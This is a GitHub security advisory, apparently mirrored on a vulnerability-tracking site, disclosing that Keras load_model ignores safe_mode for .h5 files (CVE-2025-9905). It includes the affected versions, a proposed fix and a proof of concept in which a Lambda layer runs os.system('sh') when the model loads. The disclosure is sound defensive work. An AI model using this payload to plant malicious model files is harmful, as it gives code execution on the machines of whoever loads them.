ghsa-36rr-ww3j-vrjv
Vulnerability from github
Published
2025-09-19 20:12
Modified
2025-09-19 20:12
Summary
The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Details

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.


Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details

Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True. I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:

```python def load_model(filepath, custom_objects=None, compile=True, safe_mode=True): is_keras_zip = ... is_keras_dir = ... is_hf = ...

# Support for remote zip files
if (
    file_utils.is_remote_path(filepath)
    and not file_utils.isdir(filepath)
    and not is_keras_zip
    and not is_hf
):
    ...

if is_keras_zip or is_keras_dir or is_hf:
    ...

if str(filepath).endswith((".h5", ".hdf5")):
    return legacy_h5_format.load_model_from_hdf5(
        filepath, custom_objects=custom_objects, compile=compile
    )

```

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.

Solution

Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

```python import keras

f = lambda x: ( exec("import os; os.system('sh')"), x, )

model = keras.Sequential() model.add(keras.layers.Input(shape=(1,))) model.add(keras.layers.Lambda(f)) model.compile()

keras.saving.save_model(model, "./provola.h5") ```

From the victim’s side, triggering code execution is just as simple:

```python import keras

model = keras.models.load_model("./provola.h5", safe_mode=True) ```

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.

As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-19T20:12:05Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I\u2019ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.\n\n---\n\n## Summary\n\nWhen a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique\u2014`.h5` and `.hdf5` files are simply not checked for unsafe code execution.\n\nFrom this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`.\n\n## Details\n\n### Intended behaviour \nAccording to the official Keras documentation, `safe_mode` is defined as:\n\n```\nsafe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.\n```\nI understand that the behavior described in this report is somehow **intentional**, as `safe_mode` is only applicable to `.keras` models. \n\nHowever, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user.\n\nThis issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats.\n\nAs a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers\u2014experts in binary or ML security\u2014and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.\n\n### Technical Details\n\nExamining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here\u0027s the relevant snippet:\n\n```python\ndef load_model(filepath, custom_objects=None, compile=True, safe_mode=True):\n    is_keras_zip = ...\n    is_keras_dir = ...\n    is_hf = ...\n\n    # Support for remote zip files\n    if (\n        file_utils.is_remote_path(filepath)\n        and not file_utils.isdir(filepath)\n        and not is_keras_zip\n        and not is_hf\n    ):\n        ...\n\n    if is_keras_zip or is_keras_dir or is_hf:\n        ...\n\n    if str(filepath).endswith((\".h5\", \".hdf5\")):\n        return legacy_h5_format.load_model_from_hdf5(\n            filepath, custom_objects=custom_objects, compile=compile\n        )\n```\n\nAs shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all.\n\n### Solution\n\nSince the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior\u2014and to improve security in Keras\u2014is to have the `safe_mode` parameter raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files.\n\nI recognize this fix may have minor backward compatibility considerations.\n\nIf you confirm that you\u0027re open to this approach, I\u2019d be happy to open a PR that includes the missing check.\n\n\n## PoC\n\nFrom the attacker\u2019s perspective, creating a malicious `.h5` model is as simple as the following:\n\n```python\nimport keras\n\nf = lambda x: (\n    exec(\"import os; os.system(\u0027sh\u0027)\"),\n    x,\n)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Input(shape=(1,)))\nmodel.add(keras.layers.Lambda(f))\nmodel.compile()\n\nkeras.saving.save_model(model, \"./provola.h5\")\n```\n\nFrom the victim\u2019s side, triggering code execution is just as simple:\n\n```python\nimport keras\n\nmodel = keras.models.load_model(\"./provola.h5\", safe_mode=True)\n```\n\nThat\u2019s all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.\n\n\nAs expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application.\n\n## Attack scenario\n\nThe attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model\u2014*even with* `safe_mode=True` that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.\n\nOnce the model is loaded, the attacker gains the ability to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.",
  "id": "GHSA-36rr-ww3j-vrjv",
  "modified": "2025-09-19T20:12:05Z",
  "published": "2025-09-19T20:12:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21602"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded."
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…